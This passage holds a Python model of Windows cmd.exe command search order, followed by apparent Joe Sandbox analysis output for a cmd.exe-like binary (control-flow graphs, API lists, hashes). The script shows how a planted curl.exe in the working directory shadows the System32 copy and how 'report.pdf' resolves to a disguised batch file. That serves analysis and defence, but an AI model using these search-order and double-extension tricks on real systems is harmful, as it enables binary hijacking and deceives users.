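Search order modelled, simplified from the documented Windows behaviour:
  1. Directories: the current directory first, unless the environment
     variable NoDefaultCurrentDirectoryInExePath is set (the check cmd.exe
     makes through NeedCurrentDirectoryForExePathW), then each PATH entry.
  2. In each directory: a name that already carries an extension is tried
     exactly as typed; then name + each PATHEXT extension, in PATHEXT order.
Only the text after the LAST dot is the extension the loader acts on.
"""
from __future__ import annotations

import ntpath

# Default PATHEXT value, as it appears in the function's string table.
DEFAULT_PATHEXT = ".COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC"

# Constructed stand-in for a file system; nothing here comes from the report.
SAMPLE_FILES = {
    r"C:\Users\Public\report.pdf.bat",      # double extension: a batch file
    r"C:\Users\Public\curl.exe",            # planted copy in the working dir
    r"C:\Windows\System32\curl.exe",        # legitimate copy
    r"C:\Windows\System32\cmd.exe",
}
SAMPLE_PATH = r"C:\Windows\System32;C:\Windows"   # constructed PATH


def effective_extension(name: str) -> str:
    """Extension the loader acts on: only the part after the last dot."""
    return ntpath.splitext(name)[1].lower()


def is_pathext_executable(name: str, pathext: str = DEFAULT_PATHEXT) -> bool:
    """True if cmd.exe would treat `name` as directly runnable."""
    exts = {e.lower() for e in pathext.split(";") if e}
    return effective_extension(name) in exts


def resolve_command(command: str, files: set[str], cwd: str, path: str,
                    pathext: str = DEFAULT_PATHEXT,
                    env: dict[str, str] | None = None) -> str | None:
    """Return the file cmd.exe would run for `command`, or None if not found.

    `files` is the set of existing file paths; `env` models the process
    environment (only NoDefaultCurrentDirectoryInExePath is consulted).
    """
    env = env or {}
    exts = [e for e in pathext.split(";") if e]
    # Windows file names are case-insensitive; keep the original spelling.
    by_lower = {f.lower(): f for f in files}

    # Directory order: working directory (unless suppressed), then PATH.
    dirs: list[str] = []
    if "NoDefaultCurrentDirectoryInExePath" not in env:
        dirs.append(cwd)
    dirs += [d for d in path.split(";") if d]

    for d in dirs:
        base = ntpath.join(d, command)
        # A name typed with an extension is tried exactly as given first...
        if ntpath.splitext(command)[1]:
            hit = by_lower.get(base.lower())
            if hit:
                return hit
        # ...and then PATHEXT extensions are appended, in PATHEXT order.
        for ext in exts:
            hit = by_lower.get((base + ext).lower())
            if hit:
                return hit
    return None


if __name__ == "__main__":
    cwd = r"C:\Users\Public"
    print("report.pdf.bat ->", effective_extension("report.pdf.bat"),
          "executable:", is_pathext_executable("report.pdf.bat"))
    print("curl           ->", resolve_command("curl", SAMPLE_FILES, cwd, SAMPLE_PATH))
    print("curl (no cwd)  ->", resolve_command("curl", SAMPLE_FILES, cwd, SAMPLE_PATH,
                                               env={"NoDefaultCurrentDirectoryInExePath": "1"}))
    print("report.pdf     ->", resolve_command("report.pdf", SAMPLE_FILES, cwd, SAMPLE_PATH))
```

Run it as a script to see the three effects side by side: the planted curl.exe in the working directory shadows the System32 copy until NoDefaultCurrentDirectoryInExePath is set, and typing report.pdf resolves to report.pdf.bat because .BAT is appended from PATHEXT after the exact name misses.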

Control-flow Graph (function at 7ff6a0e7aa54; rendered in the original as an interactive basic-block graph with executed/not-executed colouring, node identifiers omitted here)
• APIs referenced by its basic blocks: wcschr, towlower, _wcsnicmp, iswxdigit, iswdigit, wcsrchr, memset, iswspace
• Internal calls: 7ff6a0e7cd90, 7ff6a0e84c1c, 7ff6a0e7ff70, 7ff6a0e9eaf0, 7ff6a0e813e0, 7ff6a0e73240, 7ff6a0e73278, 7ff6a0e833a8, 7ff6a0e81300, 7ff6a0e80a6c
Memory Dump Source
• Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
• String ID: ":", ":", ":", ":ON", "OFF"
• API String ID: 972821348-467788257
• Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
• Instruction ID: 81274820d7ba85c82bf1157e7764d68989332536d476beac4afca0a57bf362ff
• Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
• Instruction Fuzzy Hash: 1022B631F0B643B6FB649F2199142B9A6A1FF89B81F498035DA0EC7795DF3CA844E350

Control-flow Graph (function at 7ff6a0e851ec; rendered in the original as an interactive basic-block graph with executed/not-executed colouring, node identifiers omitted here)
• APIs referenced by its basic blocks: GetLocaleInfoW (called from a chain of fourteen consecutive blocks, each falling through to the next on success), setlocale
• Internal calls: 7ff6a0e85508 (at entry), 7ff6a0e88f80 (after setlocale)
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale$DefaultUsersetlocale
                                                                                          • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                          • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: QueryValue$CloseOpensrandtime
                                                                                          • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                          • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileFindFirstLast

                                                                                          Control-flow Graph

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                          • Instruction ID: a08bc8b71ebd25870bfc35215c9b3a460c066f3dd1fc8cf72c4975d465745b6c
                                                                                          • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                          • Instruction Fuzzy Hash: C8513731B0A683A5EB308F15A9542BAA2A0FF54BA4F484235DE6E877D0DF3CE449D300

                                                                                          Control-flow Graph

                                                                                          • 643 7ff6a0e84d5c-7ff6a0e84e4b InitializeCriticalSection call 7ff6a0e858e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff6a0e80580 call 7ff6a0e84a14 call 7ff6a0e84ad0 call 7ff6a0e85554 GetCommandLineW
                                                                                          • 654 7ff6a0e84e4d-7ff6a0e84e54 643->654 654->654
                                                                                          • 655 7ff6a0e84e56-7ff6a0e84e61 654->655
                                                                                          • 656 7ff6a0e84e67-7ff6a0e84e7b call 7ff6a0e82e44 655->656
                                                                                          • 657 7ff6a0e851cf-7ff6a0e851e3 call 7ff6a0e73278 call 7ff6a0e84c1c 655->657
                                                                                          • 662 7ff6a0e851ba-7ff6a0e851ce call 7ff6a0e73278 call 7ff6a0e84c1c 656->662
                                                                                          • 663 7ff6a0e84e81-7ff6a0e84ec3 GetCommandLineW call 7ff6a0e813e0 call 7ff6a0e7ca40 656->663 662->657 663->662
                                                                                          • 674 7ff6a0e84ec9-7ff6a0e84ee8 call 7ff6a0e8417c call 7ff6a0e82394 663->674
                                                                                          • 678 7ff6a0e84eed-7ff6a0e84ef5 674->678 678->678
                                                                                          • 679 7ff6a0e84ef7-7ff6a0e84f1f call 7ff6a0e7aa54 678->679
                                                                                          • 682 7ff6a0e84f95-7ff6a0e84fee GetConsoleOutputCP GetCPInfo call 7ff6a0e851ec GetProcessHeap HeapAlloc 679->682
                                                                                          • 683 7ff6a0e84f21-7ff6a0e84f30 679->683
                                                                                          • 689 7ff6a0e85012-7ff6a0e85018 682->689
                                                                                          • 690 7ff6a0e84ff0-7ff6a0e85006 GetConsoleTitleW 682->690 683->682
                                                                                          • 684 7ff6a0e84f32-7ff6a0e84f39 683->684 684->682
                                                                                          • 686 7ff6a0e84f3b-7ff6a0e84f77 call 7ff6a0e73278 GetWindowsDirectoryW 684->686
                                                                                          • 696 7ff6a0e84f7d-7ff6a0e84f90 call 7ff6a0e83c24 686->696
                                                                                          • 697 7ff6a0e851b1-7ff6a0e851b9 call 7ff6a0e84c1c 686->697
                                                                                          • 692 7ff6a0e8507a-7ff6a0e8507e 689->692
                                                                                          • 693 7ff6a0e8501a-7ff6a0e85024 call 7ff6a0e83578 689->693 690->689
                                                                                          • 691 7ff6a0e85008-7ff6a0e8500f 690->691 691->689
                                                                                          • 698 7ff6a0e850eb-7ff6a0e85161 GetModuleHandleW GetProcAddress * 3 692->698
                                                                                          • 699 7ff6a0e85080-7ff6a0e850b3 call 7ff6a0e9b89c call 7ff6a0e7586c call 7ff6a0e73240 call 7ff6a0e83448 692->699 693->692
                                                                                          • 707 7ff6a0e85026-7ff6a0e85030 693->707 696->682 697->662
                                                                                          • 704 7ff6a0e85163-7ff6a0e85167 698->704
                                                                                          • 705 7ff6a0e8516f 698->705
                                                                                          • 724 7ff6a0e850b5-7ff6a0e850d0 call 7ff6a0e83448 * 2 699->724
                                                                                          • 725 7ff6a0e850d2-7ff6a0e850d7 call 7ff6a0e73278 699->725 704->705
                                                                                          • 710 7ff6a0e85169-7ff6a0e8516d 704->710
                                                                                          • 706 7ff6a0e85172-7ff6a0e851af free call 7ff6a0e88f80 705->706
                                                                                          • 712 7ff6a0e85075 call 7ff6a0e9cff0 707->712
                                                                                          • 713 7ff6a0e85032-7ff6a0e85059 GetStdHandle GetConsoleScreenBufferInfo 707->713 710->705 710->706 712->692
                                                                                          • 717 7ff6a0e8505b-7ff6a0e85067 713->717
                                                                                          • 718 7ff6a0e85069-7ff6a0e85073 713->718 717->692 718->692 718->712
                                                                                          • 729 7ff6a0e850dc-7ff6a0e850e6 GlobalFree 724->729 725->729 729->698
                                                                                          APIs
                                                                                          • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84D9A
                                                                                            • Part of subcall function 00007FF6A0E858E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF6A0E9C6DB), ref: 00007FF6A0E858EF
                                                                                          • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84DBB
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E84DCA
                                                                                          • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84DE0
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E84DEE
                                                                                          • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84E04
                                                                                            • Part of subcall function 00007FF6A0E80580: _get_osfhandle.MSVCRT ref: 00007FF6A0E80589
                                                                                            • Part of subcall function 00007FF6A0E80580: SetConsoleMode.KERNELBASE ref: 00007FF6A0E8059E
                                                                                            • Part of subcall function 00007FF6A0E80580: _get_osfhandle.MSVCRT ref: 00007FF6A0E805AF
                                                                                            • Part of subcall function 00007FF6A0E80580: GetConsoleMode.KERNELBASE ref: 00007FF6A0E805C5
                                                                                            • Part of subcall function 00007FF6A0E80580: _get_osfhandle.MSVCRT ref: 00007FF6A0E805EF
                                                                                            • Part of subcall function 00007FF6A0E80580: GetConsoleMode.KERNELBASE ref: 00007FF6A0E80605
                                                                                            • Part of subcall function 00007FF6A0E80580: _get_osfhandle.MSVCRT ref: 00007FF6A0E80632
                                                                                            • Part of subcall function 00007FF6A0E80580: SetConsoleMode.KERNELBASE ref: 00007FF6A0E80647
                                                                                            • Part of subcall function 00007FF6A0E84A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A28
                                                                                            • Part of subcall function 00007FF6A0E84A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A66
                                                                                            • Part of subcall function 00007FF6A0E84A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A7D
                                                                                            • Part of subcall function 00007FF6A0E84A14: memmove.MSVCRT(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A9A
                                                                                            • Part of subcall function 00007FF6A0E84A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84AA2
                                                                                            • Part of subcall function 00007FF6A0E84AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E78798), ref: 00007FF6A0E84AD6
                                                                                            • Part of subcall function 00007FF6A0E84AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E78798), ref: 00007FF6A0E84AEF
                                                                                            • Part of subcall function 00007FF6A0E85554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF6A0E84E35), ref: 00007FF6A0E855DA
                                                                                            • Part of subcall function 00007FF6A0E85554: RegQueryValueExW.KERNELBASE ref: 00007FF6A0E85623
                                                                                            • Part of subcall function 00007FF6A0E85554: RegQueryValueExW.KERNELBASE ref: 00007FF6A0E85667
                                                                                            • Part of subcall function 00007FF6A0E85554: RegQueryValueExW.KERNELBASE ref: 00007FF6A0E856BE
                                                                                            • Part of subcall function 00007FF6A0E85554: RegQueryValueExW.KERNELBASE ref: 00007FF6A0E85702
                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84E35
                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84E81
                                                                                          • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84F69
                                                                                          • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84F95
                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84FB0
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84FC1
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84FD8
                                                                                          • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84FF8
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E85037
                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E8504B
                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E850DF
                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E850F2
                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E8510F
                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E85130
                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E8514A
                                                                                          • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E85175
                                                                                            • Part of subcall function 00007FF6A0E83578: _get_osfhandle.MSVCRT ref: 00007FF6A0E83584
                                                                                            • Part of subcall function 00007FF6A0E83578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E8359C
                                                                                            • Part of subcall function 00007FF6A0E83578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835C3
                                                                                            • Part of subcall function 00007FF6A0E83578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835D9
                                                                                            • Part of subcall function 00007FF6A0E83578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835ED
                                                                                            • Part of subcall function 00007FF6A0E83578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E83602
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                          • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                          • API String ID: 1049357271-3021193919
                                                                                          • Opcode ID: bf394d30a17139001fd3ca4171d3fdfeea46f289a8fe0fe81f1b572c7d274a87
                                                                                          • Instruction ID: e1fbb0b33235ad749c17925de57da7012b0827dccbeddb00b0dae7ab746efb01
                                                                                          • Opcode Fuzzy Hash: bf394d30a17139001fd3ca4171d3fdfeea46f289a8fe0fe81f1b572c7d274a87
                                                                                          • Instruction Fuzzy Hash: A6C14071E0BB43B6EA049B21E9141B9B7A1FF89B91F548135D90EC77A1DF3CE449A340

                                                                                          Control-flow Graph

                                                                                          • 732 7ff6a0e83c24-7ff6a0e83c61
                                                                                          • 733 7ff6a0e83c67-7ff6a0e83c99 call 7ff6a0e7af14 call 7ff6a0e7ca40 732->733
                                                                                          • 734 7ff6a0e8ec5a-7ff6a0e8ec5f 732->734
                                                                                          • 743 7ff6a0e8ec97-7ff6a0e8eca1 call 7ff6a0e8855c 733->743
                                                                                          • 744 7ff6a0e83c9f-7ff6a0e83cb2 call 7ff6a0e7b900 733->744 734->733
                                                                                          • 736 7ff6a0e8ec65-7ff6a0e8ec6a 734->736
                                                                                          • 738 7ff6a0e8412e-7ff6a0e8415b call 7ff6a0e88f80 736->738 744->743
                                                                                          • 749 7ff6a0e83cb8-7ff6a0e83cbc 744->749
                                                                                          • 750 7ff6a0e83cbf-7ff6a0e83cc7 749->750 750->750
                                                                                          • 751 7ff6a0e83cc9-7ff6a0e83ccd 750->751
                                                                                          • 752 7ff6a0e83cd2-7ff6a0e83cd8 751->752
                                                                                          • 753 7ff6a0e83cda-7ff6a0e83cdf 752->753
                                                                                          • 754 7ff6a0e83ce5-7ff6a0e83d62 GetCurrentDirectoryW towupper iswalpha 752->754 753->754
                                                                                          • 755 7ff6a0e83faa-7ff6a0e83fb3 753->755
                                                                                          • 756 7ff6a0e83fb8 754->756
                                                                                          • 757 7ff6a0e83d68-7ff6a0e83d6c 754->757 755->752
                                                                                          • 759 7ff6a0e83fc6-7ff6a0e83fec GetLastError call 7ff6a0e8855c call 7ff6a0e8a5d6 756->759 757->756
                                                                                          • 758 7ff6a0e83d72-7ff6a0e83dcd towupper GetFullPathNameW 757->758 758->759
